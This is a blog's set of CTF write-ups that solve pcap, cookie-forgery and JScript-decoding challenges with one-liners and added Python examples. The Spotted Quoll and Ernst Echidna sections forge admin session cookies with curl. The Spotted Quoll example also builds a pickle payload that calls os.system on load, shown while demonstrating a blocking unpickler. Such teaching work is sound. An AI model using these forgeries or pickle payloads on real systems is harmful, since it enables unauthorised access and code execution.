Showing posts with label commandline. Show all posts

Tuesday, May 3, 2016

Google CTF 2016 - Various [No Big Deal Pt. 1, In Recorded Conversation, Spotted Quoll, Ernst Echidna]



So I grouped these all together for two main reasons:
  1. I was inspired seeing this short writeup for GeoKitties - https://twitter.com/k_firsov/status/726841516174508033
  2. Write-ups can take some time, so this is a good way of shortening a few challenges into one post.

Quick note about the writeups below:
  • Each example below is a one-liner solution (they may not be the best one-liners, since they can be longcat-long, but they were fun to make)
  • Each example below has a one-line output that includes the CTF{...} flag


No Big Deal Pt. 1 (50):

This one was probably one of the easiest challenges I came across (even easier than the 5pt recon): strings'ing the pcap gave an obvious base64 encoded value at the end of the dump, which decoded to the flag. Here's the one-liner (base64 -D is the macOS flag; on GNU coreutils use base64 -d, and check that tail -n 1 really lands on the base64 line of your strings output before trusting it):

strings -n 9 no-big-deal.pcap | tail -n 1 | base64 -D

Result:

CTF{betterfs.than.yours}



In Recorded Conversation (25):

The name of this challenge evoked the idea that there was going to be a hidden conversation to find a flag in, and that was exactly it, in a pcap! For this one I didn't open Wireshark and decided to go straight to tshark. This is not my actual solution from when I was playing (that was a lot more manual), but the same thing would've worked... Usually there's no time for silly things like tr, sed and multi-massaged list comprehensions to get an answer when you're on the CTF clock. Note that the inline python is Python 2 (str.decode('hex') and the print statement); tshark -T fields -e data prints each TCP payload as hex, one packet per line, and the '~' filter drops payloads carrying a nick!~user@host prefix (messages relayed from the server), leaving the client's own PRIVMSG lines to #ctf.

tshark -r irc.pcap -T fields -e data 2>/dev/null | python -c "import sys; a=sys.stdin.read().split('\n'); a=[x.decode('hex') for x in a]; a=[x for x in a if 'PRIVMSG' in x and '~' not in x]; print a" | tr ',' '\n' | grep #ctf | tail -n 8 | head -n 7 | sed 's/.*://g;s/\\.*//g' | tr '\n' ' ' | sed 's/ //g'

Result:

CTF{some_leaks_are_good_leaks_}
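As an added example (not part of the original writeup), here is the same extraction done in Python 3 over constructed sample data shaped like the output of tshark -r irc.pcap -T fields -e data: one hex-encoded TCP payload per line, with a blank line for packets that have no data field. It parses each IRC message into prefix, command, parameters and trailing text, keeps the PRIVMSGs addressed to one channel, and joins them with whitespace stripped the way the tr/sed tail of the one-liner does. The capture lines and the flag inside them are constructed; only the message grammar is real IRC, and the function names are this example's own.

```python
import re

# One IRC message: [":" prefix SP] command [SP params] [SP ":" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?"
    r"(?P<command>[A-Za-z]+|\d{3})"
    r"(?P<params>(?: (?!:)\S+)*)"
    r"(?: :(?P<trailing>.*))?$"
)


def irc_lines_from_tshark(text):
    """Turn `tshark -T fields -e data` output into decoded IRC lines.

    Each non-empty output line is one TCP payload as hex (continuous in
    current tshark, colon-separated in older builds; both are accepted).
    One payload may carry several CRLF-terminated IRC messages.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue  # packet without a data field prints an empty line
        payload = bytes.fromhex(line.replace(":", ""))
        for msg in payload.split(b"\r\n"):
            if msg:
                yield msg.decode("utf-8", errors="replace")


def parse_irc(line):
    """Split one IRC line into its prefix, command, params and trailing text."""
    m = IRC_LINE.match(line)
    if not m:
        return None
    return {
        "prefix": m.group("prefix"),
        "command": m.group("command").upper(),
        "params": m.group("params").split(),
        "trailing": m.group("trailing"),
    }


def channel_messages(text, channel):
    """Trailing text of every PRIVMSG sent to `channel`, in capture order."""
    out = []
    for raw in irc_lines_from_tshark(text):
        msg = parse_irc(raw)
        if msg and msg["command"] == "PRIVMSG" and msg["params"][:1] == [channel]:
            out.append(msg["trailing"] or "")
    return out


def recover_flag(text, channel="#ctf"):
    """Join the channel's messages with all whitespace dropped (what the
    one-liner's tr/sed did) and pull out the CTF{...} token."""
    joined = re.sub(r"\s+", "", "".join(channel_messages(text, channel)))
    m = re.search(r"CTF\{[^}]*\}", joined)
    return m.group(0) if m else None


def _hexline(segment, sep=""):
    return sep.join(f"{b:02x}" for b in segment)


# Constructed sample of tshark output (not a real capture): the flag is
# split across three PRIVMSGs to #ctf, with a decoy in another channel.
SAMPLE_TSHARK_OUTPUT = "\n".join([
    _hexline(b"NICK bob\r\nUSER bob 0 * :bob\r\n", ":"),  # older colon style
    "",                                                  # packet with no data
    _hexline(b":irc.example.net 001 bob :Welcome to the constructed network\r\n"),
    _hexline(b"JOIN #ctf\r\n"),
    _hexline(b":alice!~alice@10.0.0.5 PRIVMSG #ctf :anyone have the flag?\r\n"),
    _hexline(b"PRIVMSG #ctf :sure, in three parts\r\nPRIVMSG #ctf :CTF{constr\r\n"),
    _hexline(b"PRIVMSG #random :CTF{not_the_one_you_want}\r\n"),
    _hexline(b"PRIVMSG #ctf : ucted_sam\r\n"),
    _hexline(b"PRIVMSG #ctf :ple_flag}\r\n"),
    _hexline(b"PING :irc.example.net\r\n"),
])

if __name__ == "__main__":
    print(recover_flag(SAMPLE_TSHARK_OUTPUT))
```

Feed it real tshark output with `recover_flag(open("data.txt").read())`; if the flag was sent with spaces that matter, drop the whitespace stripping in recover_flag and look at channel_messages directly.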



Spotted Quoll (50):

This challenge was mainly solved by a team-mate (Unixist), but I helped out a bit with some minor details. I also formed it into this massive one-liner:

curl -L https://spotted-quoll.ctfcompetition.com/admin --cookie obsoletePickle=$(python -c 'import pickle; x = pickle.loads("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu".decode("base64")); x["user"] = "admin"; print pickle.dumps(x).encode("base64").replace("\n", "")') 2>/dev/null | grep -i ctf

The challenge consisted of identifying that the cookie was a base64-encoded Python pickle, dumping the current cookie, noticing that user was set to None, changing it to admin and re-encoding it / sending it off. Two things worth knowing beyond the challenge: the one-liner is Python 2 (str.decode("base64")), and pickle.loads on a value the client controls is far worse than a privilege-escalation bug, since a pickle can name any importable callable and have the loader call it; a server that unpickles a cookie has handed out code execution, not just an admin flag.


Result:

Your flag is CTF{but_wait,theres_more.if_you_call} ... but is there more(1)? or less(1)?
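The forging step as an added Python 3 example, independent of the original one-liner. It decodes the cookie quoted above, flips user to admin and re-encodes with protocol 0 the way the one-liner did. Because pickle.loads on attacker-controlled bytes will call whatever callable the pickle names, the example loads through an Unpickler subclass whose find_class refuses every global: the challenge cookie (pure literals) still loads, while a constructed cookie whose __reduce__ asks for os.system is rejected before anything runs. NoGlobalsUnpickler, RunOnLoad and the function names are this example's own.

```python
import base64
import io
import os
import pickle

# The cookie value quoted in the writeup: a protocol-0 pickle of a dict.
ORIGINAL_COOKIE = (
    "KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0"
    "ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu"
)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every GLOBAL / STACK_GLOBAL opcode.

    Plain literals (dict, str, None, int, ...) still load, but a pickle that
    names a callable (the mechanism behind pickle-based code execution, via
    __reduce__) is rejected before anything gets called.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def load_cookie(cookie_b64):
    """Decode the base64 cookie and unpickle it without resolving globals."""
    return NoGlobalsUnpickler(io.BytesIO(base64.b64decode(cookie_b64))).load()


def dump_cookie(session):
    """Re-encode a session dict the way the original cookie was encoded
    (protocol 0 pickle, then base64)."""
    return base64.b64encode(pickle.dumps(session, protocol=0)).decode()


def forge_admin_cookie(cookie_b64):
    """The challenge step: flip the pickled 'user' key from None to 'admin'."""
    session = load_cookie(cookie_b64)
    session["user"] = "admin"
    return dump_cookie(session)


class RunOnLoad:
    """A payload an attacker could send instead of a dict: its pickle tells
    the loader to call os.system('id'). It is never given to plain
    pickle.loads in this example, only to the restricted loader."""

    def __reduce__(self):
        return (os.system, ("id",))


def malicious_cookie():
    """Serialize the payload (serializing does not execute it)."""
    return base64.b64encode(pickle.dumps(RunOnLoad(), protocol=0)).decode()


def cookie_is_safe(cookie_b64):
    """True if the cookie unpickles as pure data under the restricted loader."""
    try:
        load_cookie(cookie_b64)
        return True
    except pickle.UnpicklingError:
        return False


if __name__ == "__main__":
    print(load_cookie(ORIGINAL_COOKIE))
    print(forge_admin_cookie(ORIGINAL_COOKIE))
    print("malicious cookie accepted:", cookie_is_safe(malicious_cookie()))
```

Restricting find_class is a mitigation for code that must read a pickle it did not produce; for a session cookie the right fix is not to pickle client-held state at all, or to sign it (HMAC) so the server never unpickles bytes it did not emit.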



Ernst Echidna (50):

This challenge was also a very simple web challenge, consisting of a cookie that was set to the MD5 of your username. The goal was to view the admin section, so a little echo -n admin | md5sum, and we've got our cookie. (The one-liner below uses the macOS md5 command, which prints only the hex digest; with GNU md5sum you need md5sum | cut -d' ' -f1, since it appends a filename field.)


curl https://ernst-echidna.ctfcompetition.com/admin --cookie md5-hash=$(echo -n admin | md5) 2>/dev/null | grep -i ctf

Result:

      Congratulations, your token is 'CTF{renaming-a-bunch-of-levels-sure-is-annoying}
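An added example (not the challenge's code) of why the cookie was forgeable and what the fix looks like: the weak scheme derives the cookie from the username alone with an unkeyed MD5, so anyone can produce the admin value offline; the signed variant binds the username to a server-held key with HMAC-SHA256 and verifies the tag in constant time. SECRET is generated on the fly for the demo, and all function names are this example's.

```python
import hashlib
import hmac
import secrets


def weak_cookie(username):
    """What the challenge server did: md5(username). No secret is involved,
    so the 'admin' cookie is computable by anyone."""
    return hashlib.md5(username.encode()).hexdigest()


def check_weak_cookie(cookie, claimed_user):
    return cookie == weak_cookie(claimed_user)


# Hardened variant: the cookie carries the username plus a MAC under a
# key only the server knows. Generated here for the demo; a real server
# would load it from configuration.
SECRET = secrets.token_bytes(32)


def signed_cookie(username, key=SECRET):
    mac = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}:{mac}"


def verify_signed_cookie(cookie, key=SECRET):
    """Return the username if the tag verifies, else None. compare_digest
    keeps the comparison time independent of how many bytes match."""
    username, _, mac = cookie.rpartition(":")
    if not username:
        return None
    expected = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    print("forged weak cookie:", weak_cookie("admin"))
    print("signed cookie:", signed_cookie("admin"))
    print("tampered signed cookie accepted:",
          verify_signed_cookie("admin:" + "0" * 64) is not None)
```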



These were all simple, but very fun! Had a good time forming the (mostly) one-liners above today.  Let me know if you have any more efficient examples of these in the comments!



Sunday, September 6, 2015

MMA CTF 2015 - MQAAAA (70)


MQAAAA was one of those obscure stego/misc challenges that began in a search for various Binary-to-text encodings (Wiki Page) that are publicly available out there.

Between a mix of intuitive feelings, tests of each encoding and analysis of letter frequencies, I landed on base64 as the first layer. This seemed too simple, but then, looking at the result, I saw the title of the challenge in the obscure output: "MQAAAA"

Base64 Decode:
$ echo 'I0B+Xk1RQUFBQT09CVVtLmJ3RFIrMXRLY0p0SCkJRHRubTZWbFRtaEtETnxyZHtLNDZFZG1DT2JXVThyYmpSSUFBQT09XiN+QA==' | base64 -D
Output:
#@~^MQAAAA== Um.bwDR+1tKcJtH) Dtnm6VlTmhKDN|rd{K46EdmCObWU8rbjRIAAA==^#~@

Okay.... We've got some base64 lookin' stuff... some non base64 lookin' stuff... lots of whitespace (the gaps are actually tab characters, 0x09), and MQAAAA== decodes to 1 (more precisely to the bytes 31 00 00 00: ASCII '1' followed by three nulls, which read as a little-endian 32-bit integer is 49, exactly the number of characters between the == and the closing jRIAAA==^#~@). Great.

After being stumped for a while, I went on the assumption that this was another type of encoding or language out there somewhere.
I noticed that the result started with #@~^ and ended with ^#~@... After looking at PHP for hours, with the image of its opening and closing tags burnt into my retinas, the idea of pre/post tokens for languages was fresh in my mind. So let's search for one.

On SymbolHound (a great site for searching symbols) I looked for the beginning segment: #@~^
The only Result:

It's IT | softwareontwikkeling, webdevelopment, ict oplossingen op maat
#@~^FQAAAA==@#@&CCb@#@&zz O@*@#@&TQIAAA==^#~@ HaiHai HaiHai #@~^IgAAAA==@#@&CCbCmk@#@&CmrCmk@#@&JzRR@*@#@&mgUAAA==^#~@ Cute. As you can see, @#@& appears to be a newline (@#
http://itsit.nl/klaphek/scrdec.html


This leads to a post entitled "Breaking the Windows Script Encoder".
The text we're looking at after the base64 decoding is a script encoded with Microsoft's Script Encoder (screnc.exe): the #@~^ ... ^#~@ markers delimit the encoded block, the eight characters after #@~^ carry the length of the encoded body, and the eight before ^#~@ carry a checksum. The script inside is JScript, Microsoft's dialect of ECMAScript that runs in Internet Explorer and Windows Script Host.

I did not read the article the search turned up. Instead, after looking at Wikipedia for JScript, I found a mention of the numerous online decryption services for encoded JScript. After some searching I didn't find one hosted online, but did find a C program hosted on a site that was down at the time, though available on the Wayback Machine - link.

And the C file which encodes & decodes JScript files: http://web.archive.org/web/20140209124110/http://www.virtualconspiracy.com/download/scrdec18.c


After compiling and running that against a new file containing the output of the base64 decoding, we get the flag:
WScript.echo("MMA{the_flag_word_is_obfuscation}")
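As an added example (not part of the original post, and not a port of scrdec18.c), the following Python 3 parses the Script Encoder envelope from the page's own base64 blob: it locates the #@~^ marker, decodes the 8-character length field, slices out the encoded body, decodes the 8-character checksum and confirms the terminator ^#~@ follows. It does not implement the character substitution itself (that is what scrdec18.c does); instead it checks the two fields against the decoded script the post ends with, which is 49 characters long and whose character codes sum to the value in the trailer. The field names and function names are this example's own.

```python
import base64
import struct

# The blob from the post: base64 wrapped around a Script Encoder container.
OUTER_B64 = (
    "I0B+Xk1RQUFBQT09CVVtLmJ3RFIrMXRLY0p0SCkJRHRubTZWbFRtaEtETnxyZHtLNDZFZG1D"
    "T2JXVThyYmpSSUFBQT09XiN+QA=="
)
PAGE_SAMPLE = base64.b64decode(OUTER_B64)

# The plaintext the post reports after running scrdec18.c on the sample.
DECODED_SCRIPT = 'WScript.echo("MMA{the_flag_word_is_obfuscation}")'

START, END = b"#@~^", b"^#~@"


def b64_u32(field):
    """Decode one of the container's 8-char fields (6 base64 chars + '==')
    into the little-endian 32-bit integer it carries."""
    return struct.unpack("<I", base64.b64decode(field))[0]


def parse_encoded_script(blob):
    """Split a Script Encoder container into its fields without decoding
    the body. Layout, as seen in this sample:

        '#@~^' + length(8) + body(length bytes) + checksum(8) + '^#~@'
    """
    start = blob.index(START) + len(START)
    length = b64_u32(blob[start:start + 8])
    body_start = start + 8
    body = blob[body_start:body_start + length]
    trailer = blob[body_start + length:]
    if len(body) != length:
        raise ValueError("length field runs past the end of the blob")
    if trailer[8:12] != END:
        raise ValueError("length field does not land on the '^#~@' terminator")
    return {"length": length, "body": body, "checksum": b64_u32(trailer[:8])}


def plaintext_checksum(script):
    """Sum of the decoded script's character codes, mod 2**32. For the
    sample on this page this equals the value stored in the trailer."""
    return sum(script.encode("latin-1")) & 0xFFFFFFFF


if __name__ == "__main__":
    info = parse_encoded_script(PAGE_SAMPLE)
    print("declared length:", info["length"], "body bytes:", len(info["body"]))
    print("stored checksum:", info["checksum"],
          "checksum of decoded script:", plaintext_checksum(DECODED_SCRIPT))
```

When triaging an unknown #@~^ blob, this envelope check is a cheap first step: a length that does not land on ^#~@ means the blob is truncated or the base64 layer was decoded wrongly, and a checksum mismatch after decoding means the decoder's tables were applied to the wrong offset.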